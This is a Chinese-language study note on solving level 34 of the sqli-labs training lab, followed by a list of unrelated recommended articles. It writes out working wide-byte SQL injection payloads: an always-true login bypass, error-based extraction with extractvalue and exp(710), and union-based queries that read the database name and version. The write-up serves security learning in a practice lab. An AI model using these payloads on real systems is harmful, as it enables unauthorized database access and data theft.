sqllab第三十四关通关笔记

知识点:

  • 宽字节注入+单引号闭合
  • 注意:不能直接在输入框进行宽字节注入,会被url编码,除非输入原始字符(%df已经是url编码了,直接输入会二次编码)
  • 错误注入
    • payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+
  • 联合注入
    • payload:username=1%df'union+select+database(),version()--+

通过抓包进行测试,发现是一个宽字节注入+单引号闭合

构造payload:username=1%df'or+1=1--+

成功显示出了id=1的用户信息

利用错误注入进行尝试

构造payload:username=1%df'or+exp(710)=1--+

界面成功回显了错误信息;说明可以进行错误注入

尝试读取数据库名

构造payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+

成功获取了数据库名;同样的可以获取数据库的其他信息

尝试进行联合注入

构造payload:username=1%df'union+select+1,2--+

输入内容成功显示到了屏幕上

利用联合注入获取数据库名和版本信息

构造payload:username=1%df'union+select+database(),version()--+

成功获取了数据库名和版本信息,同样手段可以获取数据库其他内容

10

相关推荐
孞㐑¥2 小时前
Linux之Socket 编程 UDP
linux·服务器·c++·经验分享·笔记·网络协议·udp
sealaugh324 小时前
aws(学习笔记第四十八课) appsync-graphql-dynamodb
笔记·学习·aws
freexyn7 小时前
Matlab自学笔记六十一:快速上手解方程
数据结构·笔记·matlab
很小心的小新8 小时前
12、jvm运行期优化
java·开发语言·jvm·笔记
寻丶幽风10 小时前
论文阅读笔记——NoPoSplat
论文阅读·笔记·三维重建·3dgs·相机位姿·dustr
西岭千秋雪_12 小时前
Redis缓存架构实战
java·redis·笔记·学习·缓存·架构
XvnNing12 小时前
【Verilog硬件语言学习笔记4】FPGA串口通信
笔记·学习·fpga开发
海棠蚀omo12 小时前
C++笔记-位图和布隆过滤器
开发语言·c++·笔记
大胡子大叔12 小时前
webrtc-streamer视频流播放(rstp协议h264笔记)
笔记·webrtc·rtsp·webrtc-streamer
山野万里__14 小时前
C++与Java内存共享技术:跨平台与跨语言实现指南
android·java·c++·笔记